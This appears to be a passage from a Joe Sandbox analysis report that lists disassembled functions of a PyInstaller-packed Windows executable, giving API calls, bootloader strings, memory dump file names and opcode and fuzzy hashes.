                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD4D
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD5B
                                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD85
                                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADDF3
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADDFF
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5a3d4ed180d81392a6cf4a3dafeded7478e206175eca9272761dd2187bd56e02
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF31A421B1A76291EE129B1AE8006B973A5FF48BE4F594575DF5ECB384EF3CE4448300
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d4ae6c1f5732abe56ea102d3ee9fa16a361613dadb982520e3734562492fd192
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB41A131A18AA691EF10DB69E8551ED6316FF44384F800172EF5CC36A6EF3CE645C340
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6BA3A351A,?,00000000,00007FF6BA3A3F23), ref: 00007FF6BA3A2AA0
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                                                                                        • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a8182a23c13780e6401c92c9fd7fc8c48b500facf54e986c4a195ee16457a5a2
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37217F32A19B9192E7209B59F8817EA6394BB88784F404176EF8DC3659EF7CD1858740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5dd915d36b36404ce86f70dc1682120da8bfa279304a69ed4c3c173e70c50d0f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1213B20F0CA5682FA68AB6D9A5113962535F447F0F9447B4DF7EC7AE6DE2DF8418300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f22df984048e9a670526796e3420dbc5eed755ff80c208596407c63db79874fd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B118E21A18B5186E7508B2AFC55329A6A0FB88BE4F104274EF9DC77A4EF3CD854C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8EFD
                                                                                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8F5A
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9
                                                                                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8FE5
                                                                                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A9044
                                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A9055
                                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A906A
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca174d3faf54e9f5f0cfa029f881c9ac89c01321f0ff62ee77fcfafd13dbbd69
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7141BC62B19A9281EE309B5AE4102BEB3A6FB85BC4F444175DF8DE7789DE3CE500C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB2D7
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB30D
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB33A
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB34B
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB35C
                                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB377
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0c4e4368a6ac04a6a1af16ef9cc7cac7a12af766748610e59176326dbeec837e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A112C20F0CE5282FA58AB6D965113D62439F84BB0F9447B4EF7EC76D6EE2CE8418700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6BA3A1B6A), ref: 00007FF6BA3A295E
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                                                                        • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6474216541e73cee04d5bea2235dbcdb92cf0d66e3b4a33291c267952bf03734
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C31D422B19B9552EB209B69E8406EA6396BF887D4F404136FF8DC3759EF7CD586C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                                                                                        • Instruction ID: abcc867859b592937e0a5fb97efe447c81b924d8ac483f2989db55483e6c5155
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C315B32A19A9289EB20DF69E8552F96361FF88788F840175EF4DC7B59EF3CD1448700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6BA3A918F,?,00007FF6BA3A3C55), ref: 00007FF6BA3A2BA0
                                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF6BA3A2C2A
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6bb14bf5cdbc8b869888d2abea2137adcdb3eb0d78b61a92b002b37a9e8c5c41
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2421AE62708B5182EB10DB69F8847EA73A5FB88780F404136EF8DD766AEE3CD245C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6BA3A1B99), ref: 00007FF6BA3A2760
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                                                                                        • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 650c7e43aba7845dd66f312a8e6f45dc3742a53488683232eb456c3364033eab
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F21A132A19B9182E720DB59F8807EA6394FB88380F400132FF8CC3659EF7CD1858740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
